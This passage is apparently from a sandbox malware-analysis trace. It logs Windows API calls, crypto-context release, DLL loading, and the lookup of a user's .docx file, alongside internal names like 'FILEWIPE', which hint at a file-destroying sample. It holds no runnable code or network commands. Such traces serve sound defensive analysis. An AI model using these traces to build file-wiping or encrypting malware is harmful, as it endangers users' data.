wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.854] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0171.854] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.854] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.854] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0171.854] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.855] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.855] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0171.855] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0171.855] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0171.855] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.855] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0171.856] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.856] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.856] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0171.856] FreeLibrary (hLibModule=0x74f20000) returned 1 [0171.856] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.856] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.856] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.858] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.863] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.864] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.864] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0171.864] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.866] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.866] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.docx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5bbbac0, ftCreationTime.dwHighDateTime=0x1d5e544, ftLastAccessTime.dwLowDateTime=0xb4ebf4e0, ftLastAccessTime.dwHighDateTime=0x1d5debf, ftLastWriteTime.dwLowDateTime=0xb4ebf4e0, ftLastWriteTime.dwHighDateTime=0x1d5debf, nFileSizeHigh=0x0, nFileSizeLow=0x4587, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="DS7b8_ Jws.docx", cAlternateFileName="DS7B8_~1.DOC")) returned 0x90af58 [0171.867] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0171.867] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0171.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0171.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0171.868] CharLowerBuffW (in: lpsz="byte[17799]", cchLength=0xb | out: lpsz="byte[17799]") returned 0xb [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0171.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0171.869] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0171.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.869] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0171.869] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0171.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0171.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0171.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0171.869] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0171.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0171.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0171.869] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0171.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0171.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0171.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c26c8 [0171.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c26c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0171.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.870] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0171.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0171.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0171.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0171.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0171.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0171.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0171.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0171.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0171.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0171.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0171.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0171.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0171.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0171.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0171.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0171.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0171.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0171.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0171.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0171.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0171.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0171.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0171.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0171.872] FreeLibrary (hLibModule=0x75c90000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0171.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0171.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0171.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0171.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0171.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0171.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0171.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0171.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0171.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0171.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.873] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0171.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0171.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0171.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0171.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.873] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0171.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0171.876] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0171.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0171.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0171.876] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0171.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0171.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0171.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0171.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b00 [0171.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0171.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0171.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0171.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0171.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0171.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1770 [0171.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0171.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0171.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0171.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0171.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd720 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0171.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0171.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0171.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0171.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: 